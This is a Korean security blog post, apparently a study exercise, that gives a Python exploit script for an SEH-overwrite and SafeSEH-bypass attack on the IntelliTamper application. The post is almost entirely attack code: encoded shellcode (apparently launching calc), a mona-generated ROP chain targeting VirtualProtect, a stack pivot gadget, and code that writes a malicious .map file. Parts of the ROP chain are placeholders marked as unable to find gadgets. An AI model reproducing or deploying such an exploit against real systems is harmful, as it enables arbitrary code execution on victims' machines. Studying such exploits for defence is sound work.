intellitamper SAFE SEH Bypass Exploit

2018. 1. 19. 16:250x04 pwnable/윈도우즈 어플리케이션 취약점 분석

728x90

후.... 이때까지는 SEH Handler 뒤에서 처리했는데 이번엔 스택 피벗을 앞에서 조정해서 하는 문제였다.. 에고 어렵다..
친구가 힌트 안줬으면 계속 헤맸을 것 같다.

#-*-encoding:utf-8-*-


import struct

import sys

#seh

seh_next = struct.pack('<L',0x5D09A561) # call esp

# 0x5D109C6F      jmp esp

seh_handler = struct.pack('<L',0x5D109C6F) # POP EBP # POP EBP # RETN


#calc

#buf

buf =  ""

buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"

buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"

buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"

buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"

buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"

buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"

buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"

buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"

buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"

buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"

buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"

buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"

buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"

buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"

buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"

buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"

buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"

buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"

buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"

buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"

buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"

buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"

buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"

buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"

buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"

buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"

buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"

buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"

buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"

buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"

buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"

buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"

buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"

buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"

buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"

buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"

buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"

buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"

buf += "\x76\x74\x33\x79\x76\x35\x41\x41"


#pattern = "mona 이용하면 됨"


#print len(pattern)

print len(buf)

def create_rop_chain():


    # rop chain generated with mona.py - www.corelan.be

    rop_gadgets = ""

    rop_gadgets += struct.pack('<L',0x5D0913B4)  # POP ESI # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x41414141)  # ESI FILLER

    rop_gadgets += struct.pack('<L',0x5D09398C)  # POP EBX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x00000201)  # 0x00000201-> ebx

    rop_gadgets += struct.pack('<L',0x5D09398C)  # POP EBX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x00000040)  # 0x00000040-> ebx

    #rop_gadgets += struct.pack('<L',0x00000000)  # [-] Unable to find a gadget to clear edx

    rop_gadgets += struct.pack('<L',0x004183fe)  # ADD EDX,EBX # POP EBX # RETN 0x10 [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (compensate)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x5D09389B)  # POP ECX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x5D102000)  # &Writable location [intellitamper.exe]

    rop_gadgets += struct.pack('<L',0x5D)  # POP EDI # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x0040ec02)  # RETN (ROP NOP) [intellitamper.exe]

    rop_gadgets += struct.pack('<L',0x00402799)  # POP ESI # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x004176fc)  # JMP [EAX] [intellitamper.exe]

    rop_gadgets += struct.pack('<L',0x0041d0f3)  # POP EAX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x77c11120)  # ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT msvcrt.dll]

    rop_gadgets += struct.pack('<L',0x00000000)  # [-] Unable to find pushad gadget

    rop_gadgets += struct.pack('<L',0x00000000)  # <- Unable to find ptr to 'jmp esp'

    return rop_gadgets


rop_chain = create_rop_chain()


esp_move = struct.pack('<L',0x5D0F0C94)

# 0x00412874 : {pivot 528 / 0x210} :  # POP ESI # POP EBP # POP EBX # ADD ESP,204 # RETN -> 

#stack_pivot = struct.pack('<L',0x00412874) # stack pivot  == jmp

# 0x00413acc : {pivot 9780 / 0x2634} :  # ADD ESP,2634 # RETN 

stack_pivot = struct.pack('<L',0x413acc) # ADD ESP, 2634

#stack_pivot += struct.pack('<L',0x5D09A561)

#stack_pivot += (esp_move)*72

# 11152


# ADD ESP,1

# 83 C4 01 00 -> 00 01 C4 83

# first nop : 516

# 10632 - 7164

# 3468 - 12 = 3456 - 502 

#payload = "\x90"*516 + "\x90"*7160 + "B"*12 + struct.pack('<L',0x5D09A561) * 12 +buf + "A"*(2948) + seh_next + struct.pack('<L',0x5D09A561)  + stack_pivot + "\x90"*80 + buf + "x90"*20000

#payload = "A"*(11156-4)

                #seh_next -> use CALL ESP

# 11152 - 7680 = 3472

payload = "A"*(11152-7680) + "\x90" * (4204-502) + buf + seh_next + "\x90"*(3472-502) + buf + seh_next +stack_pivot#+ seh_next + seh_handler 


f = open('map_exploit.map','wb')

f.write(payload[:20000])

f.close()



'0x04 pwnable > 윈도우즈 어플리케이션 취약점 분석' 카테고리의 다른 글

Target : Soritong 1.0  (0) 2018.01.19
Target : IntellTamper  (0) 2018.01.19
Millenium MP3 Studio SEH Overwrite BOF  (0) 2018.01.19
soritong v.1.0  (0) 2018.01.19
MP3CDConverter DEP bypass exploit  (0) 2018.01.18